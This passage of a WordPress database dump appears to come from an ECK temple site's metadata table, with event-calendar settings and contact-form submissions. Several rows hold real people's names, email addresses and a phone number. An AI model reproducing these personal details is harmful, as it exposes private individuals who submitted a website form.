ccurrences\";s:18:\"end_at_occurrences\";s:0:\"\";}}'),(160525,266604,'mec_additional_location_ids','a:0:{}'),(160524,266604,'mec_additional_organizer_ids','a:0:{}'),(160523,266604,'mec_currency','a:0:{}'),(160522,266604,'mec_cost',''),(132470,263833,'_field_67','Christine'),(132471,263833,'_field_68','DiNunzio'),(132472,263833,'_field_69','cdinunzio@comcast.net'),(132473,263833,'_field_70','(239) 564-2401'),(132655,263860,'_seq_num','16'),(136326,264255,'popup_conversion_count','0'),(136325,264255,'popup_open_count','24'),(136324,264255,'data_version','3'),(132662,263863,'protect_children',''),(132663,263863,'_field_67','Test10'),(132664,263863,'_field_68','Testing'),(132665,263863,'_field_69','choll.03@comcast.net'),(132666,263863,'_field_70','(555) 555-5555'),(132667,263863,'_field_71','Please Select'),(132668,263863,'_field_74','ECK Temple Vahana Leader'),(132669,263863,'_field_75','asdgagadsgasdg\nasgdd'),(132670,263863,'_form_id','8'),(132671,263863,'_seq_num','17'),(136327,264255,'_edit_lock','1616963780:2'),(136323,264255,'protect_children',''),(132680,263867,'protect_children',''),(132681,263867,'_field_377','Testing'),(132682,263867,'_field_378','Preview'),(132683,263867,'_field_379','choll.03@comcast.net'),(132684,263867,'_field_380','(555) 555-5555'),(132685,263867,'_field_381','Co Springs'),(132686,263867,'_field_384','Spiritual Services Director'),(132687,263867,'_field_385','adsjfa;sdljf;as\nadfklsadg;isdfphi-rtyerty\netye\ngdsl;kfnblxfdkbs'),(132688,263867,'_form_id','41'),(132689,263867,'_seq_num','1'),(132690,263868,'protect_children',''),(132691,263868,'_field_377','Test'),(132692,263868,'_field_378','Preview3'),(132693,263868,'_field_379','choll.03@comcast.ne'),(132694,263868,'_field_380','(555) 555-5555'),(132695,263868,'_field_381','Boulder'),(132696,263868,'_field_384','Spiritual Services Director'),(132697,263868,'_field_385','sragadgas'),(132698,263868,'_form_id','41'),(132699,263868,'_seq_num','2'),(132700,263871,'protect_children',''),(132701,263871,'_field_377','Test A'),(132702,263871,'_field_378','Testomg'),(132703,263871,'_field_379','choll.03@comcast.net'),(132704,263871,'_field_380','(555) 555-5555'),(132705,263871,'_field_381','Co Springs'),(132706,263871,'_field_384','eck-temple-director'),(132707,263871,'_field_385','sdgasdgasdgaas'),(132708,263871,'_form_id','41'),(132709,263871,'_seq_num','3'),(143414,265124,'_field_137','letter to mahanta from pegah'),(143413,265124,'_field_135','pegah_hashemi1526@yahoo.com'),(132715,263875,'protect_children',''),(132716,263875,'_field_377','tEST B'),(132717,263875,'_field_378','TEST'),(132718,263875,'_field_379','choll.03@comcast.net'),(132719,263875,'_field_380','(555) 555-5555'),(132720,263875,'_field_381','Loveland'),(132721,263875,'_field_384','eck-temple-director'),(132722,263875,'_field_385','GDVZVc'),(132723,263875,'_form_id','41'),(132724,263875,'_seq_num','4'),(132725,263878,'protect_children',''),(132726,263878,'_field_377','testC'),(132727,263878,'_field_378','Testing'),(132728,263878,'_field_379','choll.03@comcast.net'),(132729,263878,'_field_380','(555) 555-5555'),(132730,263878,'_field_381','Denver'),(132731,263878,'_field_384','Spiritual Services Director'),(132732,263878,'_field_385','sEDFADFASDFASDFA'),(132733,263878,'_form_id','41'),(132734,263878,'_seq_num','5'),(132735,263882,'_field_133','fabia'),(132736,263882,'_field_134','teci'),(132737,263882,'_field_135','fab.teci@gmail.com'),(132738,263882,'_field_137','Fraudulent Faith '),(132739,263882,'_field_138','Fraudulent Faith \n\n\nNow the Spirit expressly says that in later times some will depart from the faith by giving heed to deceitful spirits and doctrines of demons. (1 Timothy 4:1 RSV)\n\nAs we draw near to the end, before the return of the Lord, there may come an increasing departure from the faith, but I do not think this passage is talking about any one great departure. In fact, other Scriptures suggest that the departure from the faith will occur at the time of the appearance of the man whom Paul, in Second Thessalonians, calls \"the man of sin\" (2 Thessalonians 2:3 KJV), the so-called \"antichrist\" (1 John 2:18), who will lead this great departure from the faith.\n\nThis verse in First Timothy, however, is more properly understood when it is translated, \"in succeeding seasons there will be many departing from the faith\" -- i.e., this is something that is going to go on, the apostle is suggesting, throughout the whole course of Christian history, in succeeding seasons of time. Just as there are several seasons in a calendar year, so in the calendar of history God has seasons for human events -- seasons of war, seasons of peace, seasons of unrest in society, when everything seems to be torn apart (we are going through such a season now); seasons of discovery, when the human mind breaks through into new vistas of truth, geographical discoveries, scientific discoveries; seasons of retrenchment, when everything seems to quiet down; and, as the apostle clearly says here, \"seasons of deceit,\" when error breaks forth afresh; like a fountain, it seems to gush out a whole new spectrum of untruth. I have lived long enough to have seen several such seasons.\n\nThese seasons of deceit were predicted by the Holy Spirit, we do not know how. Perhaps Paul learned this in some of those direct visions and visits from Jesus himself. Perhaps it came through the prophetic ministry of some of the New Testament prophets. At any rate, the Spirit had precisely stated that there would be succeeding seasons of deceit.\n\nIn the last part of the 19th century, there was a pronounced season of deceit, when new cults that have occupied the scene ever since emerged here in America. Mormonism was born then; Jehovah\'s Witnesses came into being during that latter part of the 19th century; Christian Science emerged. All of these claimed to be Christian, yet they distorted biblical Christianity. That period in the 19th century was followed by a period of quiet, when no new cults emerged. Error was being taught but no new organizations were formed.\n\nSuddenly, in the mid-60\'s, it all broke loose again. A torrent of error began to flood our churches and the media. The Moonies came into existence under the Korean leader, Sun Myung Moon; the Hare Krishna, those young people in saffron robes with shaved heads, started appearing in airports, passing out literature and pinning flowers to lapels; Scientology, with its strange and cruel doctrines, was born; Transcendental Meditation came into popularity then.\n\nHere the apostle is explaining that strange phenomenon to us. He says these things will occur in successive seasons of time. During those times, Paul says, many will depart from the truth, depart from the faith as it is presented in the apostolic Scriptures.\n\nThese groups make their appeal in various ways: some appeal to the emotions, some to the intellect, some to the will, to the pride of mankind. But they all have one common characteristic. This characteristic is indicated in this passage by the way the apostle moves from the central truth of Christianity, \"the mystery of wholeness\" (the person of our Lord and his work) expressed in Chapter 3, Verse 16, to the sharp and stark contrast of this \"departure from the faith.\" Thus Paul seems strongly to suggest that the central focus of all error is to present a different Jesus; that is the key mark of deceit.\n\nIf you want to know whether a group you are listening to, or are in touch with, is preaching and teaching true Christianity, ask yourself: \"What do they say about Jesus? Who is he? Is he God appearing as man? Did he come in the flesh? Is he the Savior who has in himself accomplished all that God requires for the redemption of humanity?\" Ask yourself, \"What part does the blood of Jesus play in this teaching? What is said about his Person?\"\n\nThe central deviation of all religious error is a negative testimony to the centrality of Christ in the universe. Even the unseen forces of life know that Jesus is central. Jesus is truly Lord, so the thrust of error is to attack him.\n\nThis is why in a university like Stanford it is possible to teach Buddhism, or some other teaching, and find it widely approved and supported by the faculty and the administration. Someone told me this morning that he took a course at Stanford University on Druids and Druidism and the religion of King Arthur. It became evident through the course that the teacher believed these things and was actively propagating a belief in Druidism -- and nobody objected. But when Jesus, when true Christianity, is presented, there immediately is sharp and subtle opposition against it. This is what the apostle Paul is pointing out.\n\nPaul reveals the ultimate origin of these cults as coming from \"deceitful spirits.\" \n\n'),(132740,263882,'_form_id','13'),(132741,263882,'_seq_num','66'),(132742,263883,'protect_children',''),(132743,263883,'_edit_lock','1634575669:2'),(132744,263883,'_edit_last','2'),(132745,263883,'_wp_page_template','default'),(132746,263883,'passster_activate_protection',NULL),(132747,263883,'passster_protection_type','password'),(132748,263883,'boldgrid_hide_page_title','0'),(132749,263883,'boldgrid_in_page_containers','1'),(132750,263883,'bgseo_robots_index','index'),(132751,263883,'bgseo_robots_follow','follow'),(132752,263885,'protect_children',''),(132753,263885,'passster_activate_protection',NULL),(132754,263885,'passster_protection_type','password'),(132755,263885,'boldgrid_hide_page_title','0'),(132756,263885,'boldgrid_in_page_containers','1'),(132757,263885,'_menu_item_type','post_type'),(132758,263885,'_menu_item_menu_item_parent','0'),(132759,263885,'_menu_item_object_id','263883'),(132760,263885,'_menu_item_object','page'),(132761,263885,'_menu_item_target',''),(132762,263885,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(132763,263885,'_menu_item_xfn',''),(132764,263885,'_menu_item_url',''),(132765,263887,'protect_children',''),(132766,263887,'_field_377','TestnewA'),(132767,263887,'_field_378','testing'),(132768,263887,'_field_379','choll.03@comcast.net'),(132769,263887,'_field_380','(555) 555-5555'),(132770,263887,'_field_381','Please Select'),(132771,263887,'_field_384','ECK Temple Vahana Leader'),(132772,263887,'_field_385','FbDScvcbvzx'),(132773,263887,'_form_id','41'),(132774,263887,'_seq_num','6'),(132775,263890,'_wp_attached_file','2021/02/email-header-logo.png'),(132776,263890,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:429;s:6:\"height\";i:44;s:4:\"file\";s:29:\"2021/02/email-header-logo.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"email-header-logo-300x31.png\";s:5:\"width\";i:300;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"email-header-logo-150x44.png\";s:5:\"width\";i:150;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132777,263890,'_edit_lock','1614119444:2'),(132778,263891,'protect_children',''),(132779,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132780,263891,'_EventOrigin','events-calendar'),(132781,263891,'protect_children',''),(132782,263891,'protect_children',''),(132783,263891,'protect_children',''),(132784,263891,'protect_children',''),(132785,263891,'protect_children',''),(132786,263891,'protect_children',''),(132787,263891,'protect_children',''),(132788,263891,'protect_children',''),(132789,263891,'protect_children',''),(132790,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132822,263891,'_EventCurrencyPosition','prefix'),(132791,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132821,263891,'_EventCurrencySymbol',''),(132792,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132820,263891,'_EventDuration','3600'),(132823,263891,'_EventCost',''),(132793,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132819,263891,'_EventEndDateUTC','2021-03-11 03:00:00'),(132794,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132818,263891,'_EventStartDateUTC','2021-03-11 02:00:00'),(132824,263891,'_EventURL',''),(132795,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132817,263891,'_EventEndDate','2021-03-10 20:00:00'),(132825,263891,'_EventTimezone','America/Denver'),(132796,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132816,263891,'_EventStartDate','2021-03-10 19:00:00'),(132826,263891,'_EventTimezoneAbbr','MST'),(132797,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132815,263891,'_EventShowMap',''),(132827,263891,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(132798,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132814,263891,'_EventShowMapLink',''),(132828,263891,'_RTECregistrationsDisabled','1'),(132829,263891,'_RTECdeadlineType','start'),(132799,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132813,263891,'boldgrid_hide_page_title','0'),(132830,263891,'_RTECwhoCanRegister','any'),(132800,263891,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1614197996;s:12:\"_EventOrigin\";i:1614197996;s:13:\"_thumbnail_id\";i:1614198352;s:24:\"boldgrid_hide_page_title\";i:1614197996;s:17:\"_EventShowMapLink\";i:1614197996;s:13:\"_EventShowMap\";i:1614197996;s:15:\"_EventStartDate\";i:1614198353;s:13:\"_EventEndDate\";i:1614198353;s:18:\"_EventStartDateUTC\";i:1614198353;s:16:\"_EventEndDateUTC\";i:1614198353;s:14:\"_EventDuration\";i:1614197996;s:20:\"_EventCurrencySymbol\";i:1614197996;s:22:\"_EventCurrencyPosition\";i:1614197996;s:10:\"_EventCost\";i:1614197996;s:9:\"_EventURL\";i:1614197996;s:14:\"_EventTimezone\";i:1614197996;s:18:\"_EventTimezoneAbbr\";i:1614197996;s:27:\"_EventNextPendingRecurrence\";i:1614197996;s:26:\"_RTECregistrationsDisabled\";i:1614197996;s:17:\"_RTECdeadlineType\";i:1614197996;s:19:\"_RTECwhoCanRegister\";i:1614197996;s:23:\"_RTEClimitRegistrations\";i:1614197996;s:21:\"_RTECmaxRegistrations\";i:1614197996;s:16:\"_EventRecurrence\";i:1614197996;s:18:\"_RTECnumRegistered\";i:1614197996;s:13:\"_EventVenueID\";i:1614197996;s:12:\"_dp_original\";i:1614197996;s:10:\"_edit_last\";i:1614198018;s:12:\"post_content\";i:1614200121;s:10:\"post_title\";i:1614198170;s:16:\"tribe_events_cat\";i:1614225381;s:11:\"post_status\";i:1614198353;}'),(132802,263891,'_EventOrigin','events-calendar'),(132803,263891,'_EventOrigin','events-calendar'),(132804,263891,'_EventOrigin','events-calendar'),(132805,263891,'_EventOrigin','events-calendar'),(132806,263891,'_EventOrigin','events-calendar'),(132807,263891,'_EventOrigin','events-calendar'),(132808,263891,'_EventOrigin','events-calendar'),(132809,263891,'_EventOrigin','events-calendar'),(132810,263891,'_EventOrigin','events-calendar'),(132811,263891,'_EventOrigin','events-calendar'),(132812,263891,'_thumbnail_id','263892'),(132801,263891,'_EventOrigin','events-calendar'),(132831,263891,'_RTEClimitRegistrations','0'),(132832,263891,'_RTECmaxRegistrations','30'),(132833,263891,'_EventRecurrence','a:3